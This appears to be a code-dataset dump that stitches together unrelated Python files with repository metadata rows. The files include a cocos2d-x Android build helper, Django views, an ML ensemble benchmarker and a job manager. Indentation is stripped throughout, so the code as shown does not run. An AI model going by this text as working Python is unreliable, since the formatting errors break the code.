if cfg.has_key(AndroidBuilder.CFG_KEY_STORE):
self.key_store = cfg[AndroidBuilder.CFG_KEY_STORE]
move_cfg["key.store"] = self.key_store
del cfg[AndroidBuilder.CFG_KEY_STORE]
self.key_store_pass = None
if cfg.has_key(AndroidBuilder.CFG_KEY_STORE_PASS):
self.key_store_pass = cfg[AndroidBuilder.CFG_KEY_STORE_PASS]
move_cfg["key.store.password"] = self.key_store_pass
del cfg[AndroidBuilder.CFG_KEY_STORE_PASS]
self.alias = None
if cfg.has_key(AndroidBuilder.CFG_KEY_ALIAS):
self.alias = cfg[AndroidBuilder.CFG_KEY_ALIAS]
move_cfg["key.alias"] = self.alias
del cfg[AndroidBuilder.CFG_KEY_ALIAS]
self.alias_pass = None
if cfg.has_key(AndroidBuilder.CFG_KEY_ALIAS_PASS):
self.alias_pass = cfg[AndroidBuilder.CFG_KEY_ALIAS_PASS]
move_cfg["key.alias.password"] = self.alias_pass
del cfg[AndroidBuilder.CFG_KEY_ALIAS_PASS]
if len(move_cfg) > 0:
# move the config into ant.properties
self._move_cfg(move_cfg)
with open(self.cfg_path, 'w') as outfile:
json.dump(cfg, outfile, sort_keys = True, indent = 4)
outfile.close()
def has_keystore_in_antprops(self):
keystore = None
try:
file_obj = open(self.ant_cfg_file)
pattern = re.compile(r"^key\.store=(.+)")
for line in file_obj:
str1 = line.replace(' ', '')
str2 = str1.replace('\t', '')
match = pattern.match(str2)
if match is not None:
keystore = match.group(1)
break
file_obj.close()
except:
pass
if keystore is None:
return False
else:
return True
def _write_ant_properties(self, cfg):
file_obj = open(self.ant_cfg_file, "a+")
for key in cfg.keys():
str_cfg = "%s=%s\n" % (key, cfg[key])
file_obj.write(str_cfg)
file_obj.close()
def _move_cfg(self, cfg):
if not self.has_keystore_in_antprops():
self._write_ant_properties(cfg)
def remove_c_libs(self, libs_dir):
for file_name in os.listdir(libs_dir):
lib_file = os.path.join(libs_dir, file_name)
if os.path.isfile(lib_file):
ext = os.path.splitext(lib_file)[1]
if ext == ".a" or ext == ".so":
os.remove(lib_file)
def update_project(self, sdk_root, android_platform):
sdk_tool_path = os.path.join(sdk_root, "tools", "android")
app_android_root = self.app_android_root
# check the android platform
target_str = self.check_android_platform(sdk_root, android_platform, app_android_root, False)
# update project
command = "%s update project -t %s -p %s" % (cocos.CMDRunner.convert_path_to_cmd(sdk_tool_path), target_str, app_android_root)
self._run_cmd(command)
# update lib-projects
self.update_lib_projects(sdk_root, sdk_tool_path, android_platform)
def get_toolchain_version(self, ndk_root, compile_obj):
ret_version = "4.8"
version_file_path = os.path.join(ndk_root, "RELEASE.TXT")
try:
versionFile = open(version_file_path)
lines = versionFile.readlines()
versionFile.close()
version_num = None
version_char = None
pattern = r'^[a-zA-Z]+(\d+)(\w)'
for line in lines:
str_line = line.lstrip()
match = re.match(pattern, str_line)
if match:
version_num = int(match.group(1))
version_char = match.group(2)
break
if version_num is None:
cocos.Logging.warning("Parse NDK version from file %s failed." % version_file_path)
else:
version_char = version_char.lower()
if version_num > 10 or (version_num == 10 and cmp(version_char, 'c') >= 0):
ret_version = "4.9"
else:
compile_obj.add_warning_at_end(
'''The NDK version is not r10c or above.
Your application may crash or freeze on Android L(5.0) when using BMFont and HttpClient.
For More information:
https://github.com/cocos2d/cocos2d-x/issues/9114
https://github.com/cocos2d/cocos2d-x/issues/9138\n''')
except:
cocos.Logging.warning("Parse NDK version from file %s failed." % version_file_path)
cocos.Logging.info("NDK_TOOLCHAIN_VERSION: %s" % ret_version)
if ret_version == "4.8":
compile_obj.add_warning_at_end(
"Your application may crash when using c++ 11 regular expression with NDK_TOOLCHAIN_VERSION %s" % ret_version)
return ret_version
def do_ndk_build(self, ndk_build_param, build_mode, compile_obj):
cocos.Logging.info('NDK build mode: %s' % build_mode)
ndk_root = cocos.check_environment_variable('NDK_ROOT')
toolchain_version = self.get_toolchain_version(ndk_root, compile_obj)
app_android_root = self.app_android_root
reload(sys)
sys.setdefaultencoding('utf8')
ndk_path = os.path.join(ndk_root, "ndk-build")
module_paths = []
for cfg_path in self.ndk_module_paths:
if cfg_path.find("${ENGINE_ROOT}") >= 0:
cocos_root = cocos.check_environment_variable("COCOS_X_ROOT")
module_paths.append(cfg_path.replace("${ENGINE_ROOT}", cocos_root))
elif cfg_path.find("${COCOS_FRAMEWORKS}") >= 0:
cocos_frameworks = cocos.check_environment_variable("COCOS_FRAMEWORKS")
module_paths.append(cfg_path.replace("${COCOS_FRAMEWORKS}", cocos_frameworks))
else:
module_paths.append(os.path.join(app_android_root, cfg_path))
# delete template static and dynamic files
obj_local_dir = os.path.join(self.app_android_root, "obj", "local")
if os.path.isdir(obj_local_dir):
for abi_dir in os.listdir(obj_local_dir):
static_file_path = os.path.join(self.app_android_root, "obj", "local", abi_dir)
if os.path.isdir(static_file_path):
self.remove_c_libs(static_file_path)
# windows should use ";" to seperate module paths
if cocos.os_is_win32():
ndk_module_path = ';'.join(module_paths)
else:
ndk_module_path = ':'.join(module_paths)
ndk_module_path= 'NDK_MODULE_PATH=' + ndk_module_path
if ndk_build_param is None:
ndk_build_cmd = '%s -C %s %s' % (ndk_path, app_android_root, ndk_module_path)
else:
ndk_build_cmd = '%s -C %s %s %s' % (ndk_path, app_android_root, ' '.join(ndk_build_param), ndk_module_path)
ndk_build_cmd = '%s NDK_TOOLCHAIN_VERSION=%s' % (ndk_build_cmd, toolchain_version)
if build_mode == 'debug':
ndk_build_cmd = '%s NDK_DEBUG=1' % ndk_build_cmd
self._run_cmd(ndk_build_cmd)
def _xml_attr(self, dir, file_name, node_name, attr):
doc = minidom.parse(os.path.join(dir, file_name))
return doc.getElementsByTagName(node_name)[0].getAttribute(attr)
def update_lib_projects(self, sdk_root, sdk_tool_path, android_platform):
property_file = os.path.join(self.app_android_root, "project.properties")
if not os.path.isfile(property_file):
return
patten = re.compile(r'^android\.library\.reference\.[\d]+=(.+)')
for line in open(property_file):
str1 = line.replace(' ', '')
str2 = str1.replace('\t', '')
match = patten.match(str2)
if match is not None:
# a lib project is found
lib_path = match.group(1)
abs_lib_path = os.path.join(self.app_android_root, lib_path)
if os.path.isdir(abs_lib_path):
target_str = self.check_android_platform(sdk_root, android_platform, abs_lib_path, True)
command = "%s update lib-project -p %s -t %s" % (cocos.CMDRunner.convert_path_to_cmd(sdk_tool_path), abs_lib_path, target_str)
self._run_cmd(command)
def select_default_android_platform(self, min_api_level):
''' select a default android platform in SDK_ROOT
'''
sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
platforms_dir = os.path.join(sdk_root, "platforms")
ret_num = -1
ret_platform = ""
if os.path.isdir(platforms_dir):
for dir_name in os.listdir(platforms_dir):
if not os.path.isdir(os.path.join(platforms_dir, dir_name)):
continue
num = self.get_api_level(dir_name, raise_error=False)
if num >= min_api_level:
if ret_num == -1 or ret_num > num:
ret_num = num
ret_platform = dir_name
if ret_num != -1:
return ret_platform
else:
return None
def get_api_level(self, target_str, raise_error=True):
special_targats_info = {
"android-4.2" : 17,
"android-L" : 20
}
if special_targats_info.has_key(target_str):
ret = special_targats_info[target_str]
else:
match = re.match(r'android-(\d+)', target_str)
if match is not None:
ret = int(match.group(1))
else:
if raise_error:
raise cocos.CCPluginError("%s is not a valid android target platform." % target_str)
else:
ret = -1
return ret
def get_target_config(self, proj_path):
property_file = os.path.join(proj_path, "project.properties")
if not os.path.isfile(property_file):
raise cocos.CCPluginError("Can't find file \"%s\"" % property_file)
patten = re.compile(r'^target=(.+)')
for line in open(property_file):
str1 = line.replace(' ', '')
str2 = str1.replace('\t', '')
match = patten.match(str2)
if match is not None:
target = match.group(1)
target_num = self.get_api_level(target)
if target_num > 0:
return target_num
raise cocos.CCPluginError("Can't find \"target\" in file \"%s\"" % property_file)
# check the selected android platform
def check_android_platform(self, sdk_root, android_platform, proj_path, auto_select):
ret = android_platform
min_platform = self.get_target_config(proj_path)
if android_platform is None:
# not specified platform, found one
cocos.Logging.info('Android platform not specified, searching a default one...')
ret = self.select_default_android_platform(min_platform)
else:
# check whether it's larger than min_platform
select_api_level = self.get_api_level(android_platform)
if select_api_level < min_platform:
if auto_select:
# select one for project
ret = self.select_default_android_platform(min_platform)
else:
# raise error
raise cocos.CCPluginError("The android-platform of project \"%s\" should be equal/larger than %d, but %d is specified." % (proj_path, min_platform, select_api_level))
if ret is None:
raise cocos.CCPluginError("Can't find right android-platform for project : \"%s\". The android-platform should be equal/larger than %d" % (proj_path, min_platform))
ret_path = os.path.join(cocos.CMDRunner.convert_path_to_python(sdk_root), "platforms", ret)
if not os.path.isdir(ret_path):
raise cocos.CCPluginError("The directory \"%s\" can't be found in android SDK" % ret)
special_platforms_info = {
"android-4.2" : "android-17"
}
if special_platforms_info.has_key(ret):
ret = special_platforms_info[ret]
return ret
def do_build_apk(self, sdk_root, ant_root, build_mode, output_dir, custom_step_args, compile_obj):
app_android_root = self.app_android_root
# copy resources
self._copy_resources(custom_step_args)
# check the project config & compile the script files
assets_dir = os.path.join(app_android_root, "assets")
if self._project._is_lua_project():
compile_obj.compile_lua_scripts(assets_dir, assets_dir)
if self._project._is_js_project():
compile_obj.compile_js_scripts(assets_dir, assets_dir)
# gather the sign info if necessary
if build_mode == "release" and not self.has_keystore_in_antprops():
self._gather_sign_info()
# run ant build
ant_path = os.path.join(ant_root, 'ant')
buildfile_path = os.path.join(app_android_root, "build.xml")
# generate paramters for custom step
args_ant_copy = custom_step_args.copy()
target_platform = cocos_project.Platforms.ANDROID
# invoke custom step: pre-ant-build
self._project.invoke_custom_step_script(cocos_project.Project.CUSTOM_STEP_PRE_ANT_BUILD, target_platform, args_ant_copy)
command = "%s clean %s -f %s -Dsdk.dir=%s" % (cocos.CMDRunner.convert_path_to_cmd(ant_path), build_mode, buildfile_path, cocos.CMDRunner.convert_path_to_cmd(sdk_root))
self._run_cmd(command)
# invoke custom step: post-ant-build
self._project.invoke_custom_step_script(cocos_project.Project.CUSTOM_STEP_POST_ANT_BUILD, target_platform, args_ant_copy)
if output_dir:
project_name = self._xml_attr(app_android_root, 'build.xml', 'project', 'name')
apk_name = '%s-%s.apk' % (project_name, build_mode)
#TODO 'bin' is hardcoded, take the value from the Ant file
gen_apk_path = os.path.join(app_android_root, 'bin', apk_name)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
shutil.copy(gen_apk_path, output_dir)
cocos.Logging.info("Move apk to %s" % output_dir)
if build_mode == "release":
signed_name = "%s-%s-signed.apk" % (project_name, build_mode)
apk_path = os.path.join(output_dir, signed_name)
if os.path.exists(apk_path):
os.remove(apk_path)
os.rename(os.path.join(output_dir, apk_name), apk_path)
else:
apk_path = os.path.join(output_dir, apk_name)
return apk_path
else:
raise cocos.CCPluginError("Not specified the output directory!")
def _gather_sign_info(self):
user_cfg = {}
# get the path of keystore file
while True:
inputed = self._get_user_input("Please input the absolute/relative path of \".keystore\" file:")
inputed = inputed.strip()
if not os.path.isabs(inputed):
abs_path = os.path.join(self.app_android_root, inputed)
else:
abs_path = inputed
if os.path.isfile(abs_path):
user_cfg["key.store"] = inputed
break
else:
cocos.Logging.warning("The string inputed is not a file!")
# get the alias of keystore file
user_cfg["key.alias"] = self._get_user_input("Please input the alias:")
# get the keystore password
user_cfg["key.store.password"] = self._get_user_input("Please input the password of key store:")
# get the alias password
user_cfg["key.alias.password"] = self._get_user_input("Please input the password of alias:")
# write the config into ant.properties
self._write_ant_properties(user_cfg)
def _get_user_input(self, tip_msg):
cocos.Logging.warning(tip_msg)
ret = None
while True:
ret = raw_input()
break
return ret
def _copy_resources(self, custom_step_args):
app_android_root = self.app_android_root
res_files = self.res_files
# remove app_android_root/assets if it exists
assets_dir = os.path.join(app_android_root, "assets")
if os.path.isdir(assets_dir):
shutil.rmtree(assets_dir)
# generate parameters for custom steps
target_platform = cocos_project.Platforms.ANDROID
cur_custom_step_args = custom_step_args.copy()
cur_custom_step_args["assets-dir"] = assets_dir
# make dir
os.mkdir(assets_dir)
# invoke custom step : pre copy assets
self._project.invoke_custom_step_script(cocos_project.Project.CUSTOM_STEP_PRE_COPY_ASSETS, target_platform, cur_custom_step_args)
# copy resources
for cfg in res_files:
cocos.copy_files_with_config(cfg, app_android_root, assets_dir)
# invoke custom step : post copy assets
self._project.invoke_custom_step_script(cocos_project.Project.CUSTOM_STEP_POST_COPY_ASSETS, target_platform, cur_custom_step_args)
| 17,491 | 1,713 | 23 |
df8f8127a729283da8ae42c9a26f1ef82d99e21a | 190 | py | Python | atest/testdata/test_libraries/ClassWithNotKeywordDecorator.py | rdagum/robotframework | b7069d505374e9f09a140ed5a9727d2a40716446 | [
"ECL-2.0",
"Apache-2.0"
] | 7,073 | 2015-01-01T17:19:16.000Z | 2022-03-31T22:01:29.000Z | atest/testdata/test_libraries/ClassWithNotKeywordDecorator.py | imust6226/robotframework | 08c56fef2ebc64d682c7f99acd77c480d8d0e028 | [
"ECL-2.0",
"Apache-2.0"
] | 2,412 | 2015-01-02T09:29:05.000Z | 2022-03-31T13:10:46.000Z | atest/testdata/test_libraries/ClassWithNotKeywordDecorator.py | 3mdeb/robotframework | 6006ce0b3d5fc6b45c5eb040dc859acd64bfa846 | [
"ECL-2.0",
"Apache-2.0"
] | 2,298 | 2015-01-03T02:47:15.000Z | 2022-03-31T02:00:16.000Z | from robot.api.deco import not_keyword
| 15.833333 | 38 | 0.710526 | from robot.api.deco import not_keyword
class ClassWithNotKeywordDecorator:
def exposed_in_class(self):
pass
@not_keyword
def not_exposed_in_class(self):
pass
| 42 | 85 | 23 |
a15b4093e656e40e94de6847d3082d5d816ef4dd | 164 | py | Python | WEEKS/CD_Sata-Structures/_MISC/misc-examples/tuples.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/_MISC/misc-examples/tuples.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/_MISC/misc-examples/tuples.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | l1 = [1, 3, 5, 7, 9] # list mutable (read write)
t1 = (1, 3, 5, 7, 9) # tuple imutable (read only)
f(l1)
print(l1)
f(t1)
print(t1)
| 12.615385 | 50 | 0.542683 | l1 = [1, 3, 5, 7, 9] # list mutable (read write)
t1 = (1, 3, 5, 7, 9) # tuple imutable (read only)
def f(x):
x.append(29)
f(l1)
print(l1)
f(t1)
print(t1)
| 5 | 0 | 23 |
bc2349ff8bae24f07701d461a1fd2e888e76d0b2 | 1,629 | py | Python | stereo/dataset/DS.py | Owl-AI/Reversing | a4321642ccad6e7c2f4c71bcb960ee9c5edf5ed8 | [
"Apache-2.0"
] | 41 | 2020-07-06T13:02:44.000Z | 2022-03-23T04:39:19.000Z | stereo/dataset/DS.py | Owl-AI/Reversing | a4321642ccad6e7c2f4c71bcb960ee9c5edf5ed8 | [
"Apache-2.0"
] | 19 | 2020-09-23T18:40:29.000Z | 2022-02-10T02:05:39.000Z | stereo/dataset/DS.py | Owl-AI/Reversing | a4321642ccad6e7c2f4c71bcb960ee9c5edf5ed8 | [
"Apache-2.0"
] | 6 | 2020-12-03T09:49:58.000Z | 2022-02-18T12:18:34.000Z | # Copyright 2020 Filippo Aleotti, Fabio Tosi, Li Zhang, Matteo Poggi, Stefano Mattoccia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataset import KITTI
def load_from_file_test(filepath, rgb_ext):
"""Load testing images.
Args:
filepath: path to filename file
rgb_ext: extension of RGB images
Return:
left_test: list of paths to left images
right_test: list of paths to right images
"""
left_test = []
right_test = []
with open(filepath) as f:
lines = f.readlines()
for line in lines:
left, right = _load_samples_test(line, rgb_ext)
left_test.append(left)
right_test.append(right)
return left_test, right_test
def _load_samples_test(line, rgb_ext):
"""Load samples in line.
Args:
line: line to load
rgb_ext: extension of RGB image
Return:
left: list of paths to left images
right: list of paths to right images
"""
left, right = line.replace("\n", "").split(" ")
left, right = [KITTI.set_extension(x, rgb_ext) for x in [left, right]]
return left, right
| 29.618182 | 87 | 0.679558 | # Copyright 2020 Filippo Aleotti, Fabio Tosi, Li Zhang, Matteo Poggi, Stefano Mattoccia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataset import KITTI
def load_from_file_test(filepath, rgb_ext):
"""Load testing images.
Args:
filepath: path to filename file
rgb_ext: extension of RGB images
Return:
left_test: list of paths to left images
right_test: list of paths to right images
"""
left_test = []
right_test = []
with open(filepath) as f:
lines = f.readlines()
for line in lines:
left, right = _load_samples_test(line, rgb_ext)
left_test.append(left)
right_test.append(right)
return left_test, right_test
def _load_samples_test(line, rgb_ext):
"""Load samples in line.
Args:
line: line to load
rgb_ext: extension of RGB image
Return:
left: list of paths to left images
right: list of paths to right images
"""
left, right = line.replace("\n", "").split(" ")
left, right = [KITTI.set_extension(x, rgb_ext) for x in [left, right]]
return left, right
| 0 | 0 | 0 |
ee9ed6c949b34da36c66762654aacec08e5ca418 | 1,009 | py | Python | scc_home/views.py | supercooledcreations/supercooledcreations | e4fcbbfd1eb60d808273d16c1de0ffb81ac33e49 | [
"MIT"
] | null | null | null | scc_home/views.py | supercooledcreations/supercooledcreations | e4fcbbfd1eb60d808273d16c1de0ffb81ac33e49 | [
"MIT"
] | null | null | null | scc_home/views.py | supercooledcreations/supercooledcreations | e4fcbbfd1eb60d808273d16c1de0ffb81ac33e49 | [
"MIT"
] | null | null | null | # Import #
# Django
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views import View
from django.urls import reverse
from django.utils import timezone
# App
from .forms import BookmarkForm
from .models import Bookmark
# Views #
# Metrics #
# List, Add | 24.609756 | 66 | 0.693756 | # Import #
# Django
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views import View
from django.urls import reverse
from django.utils import timezone
# App
from .forms import BookmarkForm
from .models import Bookmark
# Views #
# Metrics #
class HomeView(LoginRequiredMixin, View):
# List, Add
def get(self, request, *args, **kwargs):
template_name = 'scc_home/home.html'
bookmark_list = Bookmark.objects.filter(user=request.user)
bookmark_form = BookmarkForm
context = {'bookmark_list': bookmark_list,
'bookmark_form': bookmark_form}
return render(request, template_name, context)
def post(self, request, *args, **kwargs):
form = BookmarkForm(request.POST)
form.instance.user = request.user
if form.is_valid():
form.save()
return HttpResponseRedirect(reverse('scc_home:home')) | 551 | 20 | 75 |
35580bce47e7ce13de691232e814794292ae6419 | 4,100 | py | Python | Engine/src/simulation/benchmarker/model_benchmarker.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | 2 | 2018-02-05T12:41:31.000Z | 2018-11-23T04:13:13.000Z | Engine/src/simulation/benchmarker/model_benchmarker.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | Engine/src/simulation/benchmarker/model_benchmarker.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | '''
Created on Apr 21, 2015
@author: xapharius
'''
import numpy as np
import pandas as pd
from datahandler.numerical2.numerical_data_handler import NumericalDataHandler
from sklearn.linear_model.logistic import LogisticRegression
from factory.algorithm_factory import AlgorithmFactory
from factory.homogenous_factory import HomogenousFactory
from simulation.sampler.bootstrap_sampler import BootstrapSampler
import simulation.benchmarker.dataset_loader as loader
from simulation.mr_simulator.ensemble_simulator import EnsembleSimulator
from ensemble.classification.weighted_bag import WBag
from validator.classification_validator import ClassificationValidator
from simulation.mr_simulator.wbag_simulator import WBagSimulator
class ModelBenchmarker(object):
'''
Class for running a comparison
!!! Two meta-parameters for experiment: nr_mappers of simulation and sample_size_ratio for sampler
'''
def __init__(self, data_type="numerical", sampler=BootstrapSampler(),
simulator=WBagSimulator, nr_mappers=10):
'''
Constructor - Defining an experiment/environment setting
in order to then benchmark different models
@param task: "classification" or "regression"
(to know what validation metrics to choose)
@param sampler: unbound sampler
@param nr_mappers: number of mappers simulator should use
@param train_ratio: ratio of training set to total amount of data,
the rest will be used for validaion
'''
self.data_type = data_type
self.nr_mappers = nr_mappers
self.sampler = sampler
self.sampler.sample_size_ratio = 1. / nr_mappers
# iterable of RawDataset
self.datasets = loader.get_datasets(data_type=self.data_type)
self.simulator = simulator
| 42.708333 | 129 | 0.706098 | '''
Created on Apr 21, 2015
@author: xapharius
'''
import numpy as np
import pandas as pd
from datahandler.numerical2.numerical_data_handler import NumericalDataHandler
from sklearn.linear_model.logistic import LogisticRegression
from factory.algorithm_factory import AlgorithmFactory
from factory.homogenous_factory import HomogenousFactory
from simulation.sampler.bootstrap_sampler import BootstrapSampler
import simulation.benchmarker.dataset_loader as loader
from simulation.mr_simulator.ensemble_simulator import EnsembleSimulator
from ensemble.classification.weighted_bag import WBag
from validator.classification_validator import ClassificationValidator
from simulation.mr_simulator.wbag_simulator import WBagSimulator
class ModelBenchmarker(object):
'''
Class for running a comparison
!!! Two meta-parameters for experiment: nr_mappers of simulation and sample_size_ratio for sampler
'''
def __init__(self, data_type="numerical", sampler=BootstrapSampler(),
simulator=WBagSimulator, nr_mappers=10):
'''
Constructor - Defining an experiment/environment setting
in order to then benchmark different models
@param task: "classification" or "regression"
(to know what validation metrics to choose)
@param sampler: unbound sampler
@param nr_mappers: number of mappers simulator should use
@param train_ratio: ratio of training set to total amount of data,
the rest will be used for validaion
'''
self.data_type = data_type
self.nr_mappers = nr_mappers
self.sampler = sampler
self.sampler.sample_size_ratio = 1. / nr_mappers
# iterable of RawDataset
self.datasets = loader.get_datasets(data_type=self.data_type)
self.simulator = simulator
def benchmark(self, manager_factory):
results_all = pd.DataFrame()
results_change = pd.DataFrame()
for rawdataset in self.datasets:
print "\n\nDataset={} (n={}), input_dim={}, label_dim={}"\
.format(rawdataset.name, rawdataset.total_obs, rawdataset.input_var, rawdataset.target_var)
self.sampler.bind_data(rawdataset.training_inputs, rawdataset.training_targets)
# simulation - train ensemble
simulator = self.simulator(data_sampler=self.sampler,
factory=manager_factory, ensemble_cls=WBag)
ensemble = simulator.simulate(nr_mappers=self.nr_mappers)
print "Number of Features per Model:", [manager.feature_engineer.number_of_features for manager in ensemble.managers]
print "Training Obs per model", [manager.training_data_statistics["nr_obs"] for manager in ensemble.managers]
print "Ensemble Weights", ['%.4f' % weight for weight in ensemble.weights]
print "Params per Model:"
for manager in ensemble.managers:
print manager.model.get_params()
# train benchmark model
benchmark_model = manager_factory.get_instance()
benchmark_model.feature_engineer.random_subset_of_features_ratio = 1
benchmark_model.train(rawdataset.training_inputs, rawdataset.training_targets)
# validate both
validator = ClassificationValidator()
ensemble_results = validator.validate(ensemble, rawdataset.validation_inputs, rawdataset.validation_targets)
benchmark_results = validator.validate(benchmark_model, rawdataset.validation_inputs, rawdataset.validation_targets)
# append to results list/dataframe
df_b = pd.DataFrame(benchmark_results, index=[rawdataset.name+"_b"])
df_e = pd.DataFrame(ensemble_results, index=[rawdataset.name+"_e"])
results_all = pd.concat([results_all, df_b, df_e])
change = (df_e.reset_index(drop=True) / df_b.reset_index(drop=True)) - 1
change.index=[rawdataset.name]
results_change = pd.concat([results_change, change])
return results_change, results_all
| 2,226 | 0 | 27 |
805a04eab2c89b61a881966d193f53c1ab24ddc7 | 243 | py | Python | acf_example/httpbin_client/actions/status.py | Jamim/acf | af7ebd9af7c4cd8bf977ddcb51f297107ba3fcbc | [
"MIT"
] | 5 | 2018-11-15T13:35:53.000Z | 2022-02-23T06:43:13.000Z | acf_example/httpbin_client/actions/status.py | Jamim/acf | af7ebd9af7c4cd8bf977ddcb51f297107ba3fcbc | [
"MIT"
] | 4 | 2018-12-15T23:56:35.000Z | 2018-12-19T05:48:42.000Z | acf_example/httpbin_client/actions/status.py | Jamim/acf | af7ebd9af7c4cd8bf977ddcb51f297107ba3fcbc | [
"MIT"
] | 4 | 2018-11-15T13:36:02.000Z | 2022-02-23T06:43:14.000Z | from ..wrappers.status import UpdateStatusResultWrapper
from .base import HttpbinAction
| 22.090909 | 55 | 0.765432 | from ..wrappers.status import UpdateStatusResultWrapper
from .base import HttpbinAction
class UpdateStatusAction(HttpbinAction):
METHOD = 'PUT'
URL_COMPONENTS = ('status', '{status}')
RESULT_WRAPPER = UpdateStatusResultWrapper
| 0 | 131 | 23 |
dd650dd25a31e2850c06900e6356f7ef7f9c2098 | 928 | py | Python | ch06/06_06_fav-langs.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | ch06/06_06_fav-langs.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | ch06/06_06_fav-langs.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | favorite_languages = {
'jen': 'python',
'sarah': 'c',
'edward': 'ruby',
'phil': 'python',
}
for name, language in favorite_languages.items():
print(name.title() + "'s favorite language is " +
language.title() + ".")
for name in favorite_languages.keys():
print(name.title())
friends = ['phil', 'sarah']
for name in favorite_languages.keys():
print(name.title())
if name in friends:
print(" Hi " + name.title() +
", I see your favorite language is " +
favorite_languages[name].title() + "!")
if 'erin' not in favorite_languages.keys():
print("Erin, please take our poll!")
print("The following languages have been mentioned:")
for language in favorite_languages.values():
print(language.title())
print("These languages have been mentioned at least once:")
for language in set(favorite_languages.values()):
print(language.title())
| 25.777778 | 59 | 0.636853 | favorite_languages = {
'jen': 'python',
'sarah': 'c',
'edward': 'ruby',
'phil': 'python',
}
for name, language in favorite_languages.items():
print(name.title() + "'s favorite language is " +
language.title() + ".")
for name in favorite_languages.keys():
print(name.title())
friends = ['phil', 'sarah']
for name in favorite_languages.keys():
print(name.title())
if name in friends:
print(" Hi " + name.title() +
", I see your favorite language is " +
favorite_languages[name].title() + "!")
if 'erin' not in favorite_languages.keys():
print("Erin, please take our poll!")
print("The following languages have been mentioned:")
for language in favorite_languages.values():
print(language.title())
print("These languages have been mentioned at least once:")
for language in set(favorite_languages.values()):
print(language.title())
| 0 | 0 | 0 |
1ac9df902aa5e4f7697bbdceacd57712c28d228c | 15,340 | py | Python | python/dsbox/JobManager/DistributedJobManager.py | usc-isi-i2/dsbox-ta2 | 85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2 | [
"MIT"
] | 7 | 2018-05-10T22:19:44.000Z | 2020-07-21T07:28:39.000Z | python/dsbox/JobManager/DistributedJobManager.py | usc-isi-i2/dsbox-ta2 | 85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2 | [
"MIT"
] | 187 | 2018-04-13T17:19:24.000Z | 2020-04-21T00:41:15.000Z | python/dsbox/JobManager/DistributedJobManager.py | usc-isi-i2/dsbox-ta2 | 85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2 | [
"MIT"
] | 7 | 2018-07-10T00:14:07.000Z | 2019-07-25T17:59:44.000Z | import copy
import os
import logging
import pickle
import psutil
import time
import threading
import typing
from enum import Enum
from math import ceil
from multiprocessing import Pool, Queue, Manager, current_process
from threading import Timer
_logger = logging.getLogger(__name__)
# used to save all PID of workers created
m = Manager()
_current_work_pids = m.list()
class WorkerQueueHandler(logging.handlers.QueueHandler):
'''
Adds process name to log records
'''
# def emit(self, record):
# print('emit:', record)
# return super().emit(record)
# def enqueue(self, record):
# print('enqueue:', record)
# return super().enqueue(record)
| 35.591647 | 110 | 0.585854 | import copy
import os
import logging
import pickle
import psutil
import time
import threading
import typing
from enum import Enum
from math import ceil
from multiprocessing import Pool, Queue, Manager, current_process
from threading import Timer
_logger = logging.getLogger(__name__)
# used to save all PID of workers created
m = Manager()
_current_work_pids = m.list()
class TimerResponse(Enum):
KILL_WORKERS = 0
STOP_WORKER_JOBS = 1
class WorkerQueueHandler(logging.handlers.QueueHandler):
'''
Adds process name to log records
'''
def __init__(self, queue):
super().__init__(queue)
def prepare(self, record):
if record is not None and record.msg is not None:
record.msg = f'{current_process().name:17} > ' + str(record.msg)
return super().prepare(record)
# def emit(self, record):
# print('emit:', record)
# return super().emit(record)
# def enqueue(self, record):
# print('enqueue:', record)
# return super().enqueue(record)
class QueueWrapper:
def __init__(self, name, queue):
self.name = name
self.queue = queue
def put(self, item, block=True, timeout=None):
if _logger.getEffectiveLevel() <= 10:
size = len(pickle.dumps(item))
if size > 10**7:
_logger.warning('Large message: %s queue: %d mb', self.name, size/10**6)
self.queue.put(item, block=block, timeout=timeout)
def put_nowait(self, item):
return self.queue.put(item, False)
def get(self, block=True, timeout=None):
return self.queue.get(block=block, timeout=timeout)
def get_nowaite(self):
return self.queue.get(False)
def qsize(self):
return self.queue.qsize()
def empty(self):
return self.queue.empty()
def full(self):
return self.queue.full()
def task_done(self):
self.queue.task_done()
def join(self):
self.queue.join()
class DistributedJobManager:
def __init__(self, proc_num: int = 4, timer_response=TimerResponse.STOP_WORKER_JOBS):
self.start_time = time.perf_counter()
self.proc_num = proc_num
